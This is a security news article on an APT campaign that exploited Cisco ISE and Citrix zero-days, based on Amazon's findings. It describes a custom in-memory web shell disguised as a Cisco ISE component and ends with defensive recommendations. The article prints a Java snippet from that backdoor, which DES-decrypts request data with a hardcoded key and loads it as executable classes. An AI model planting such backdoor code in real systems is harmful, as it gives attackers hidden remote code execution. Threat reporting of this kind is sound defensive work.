Zero-Day Vulnerabilities in Cisco and Citrix Targeted by APT Group, Amazon Confirms
13 November 2025 at 03:08
![]()
Deployment of a Custom Web Shell
Following the successful compromise of targeted systems, the threat actor deployed a custom-built web shell disguised as a legitimate Cisco ISE component called IdentityAuditAction. Unlike typical off-the-shelf malware, this backdoor was tailored specifically for Cisco ISE environments. Amazon’s investigation revealed that the web shell operated entirely in-memory, leaving minimal traces for forensic analysis. It used Java reflection to inject itself into active threads, registered as an HTTP listener on the Tomcat server to intercept all HTTP requests, and encrypted its communication with DES encryption using non-standard Base64 encoding. Accessing the shell required knowledge of specific HTTP headers, further obscuring its presence. The following snippet from the deserialization routine demonstrates the actor’s authentication mechanism for accessing the backdoor:if (matcher.find()) { requestBody = matcher.group(1).replace("*", "a").replace("$", "l"); Cipher encodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding"); decodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding"); byte[] key = "d384922c".getBytes(); encodeCipher.init(1, new SecretKeySpec(key, "DES")); decodeCipher.init(2, new SecretKeySpec(key, "DES")); byte[] data = Base64.getDecoder().decode(requestBody); data = decodeCipher.doFinal(data); ByteArrayOutputStream arrOut = new ByteArrayOutputStream(); if (proxyClass == null) { proxyClass = this.defineClass(data); } else { Object f = proxyClass.newInstance(); f.equals(arrOut); f.equals(request); f.equals(data); f.toString(); } }
Defensive Measures for CVE-2025-20337 and CVE-2025-5777
The simultaneous exploitation of CVE-2025-20337 and CVE-2025-5777 demonstrates the growing trend of APTs focusing on identity and access control infrastructure as high-value targets. According to Amazon, the attacks were indiscriminate and internet-facing, meaning any unpatched or exposed systems were at risk during the campaign. The “patch-gap” exploitation, attacking systems in the window before vendors can issue fixes, highlights a persistent challenge in enterprise cybersecurity. Such tactics are commonly used by well-funded threat groups that possess advanced research capabilities or access to undisclosed vulnerability data. Amazon emphasized that even well-maintained systems can fall victim to pre-authentication zero-days, denoting the need for defense-in-depth strategies. Security teams are advised to:- Restrict access to privileged security appliance endpoints like Cisco ISE and Citrix management portals through network segmentation and firewalls.
- Closely monitor for anomalous activity, such as unrecognized HTTP listeners, unusual in-memory processes, or encryption anomalies.
- Stay current with vendor advisories and threat intelligence feeds regarding emerging zero-day vulnerabilities.
- Minimize public internet exposure of critical identity and network control systems, routing access through VPNs or isolated management interfaces.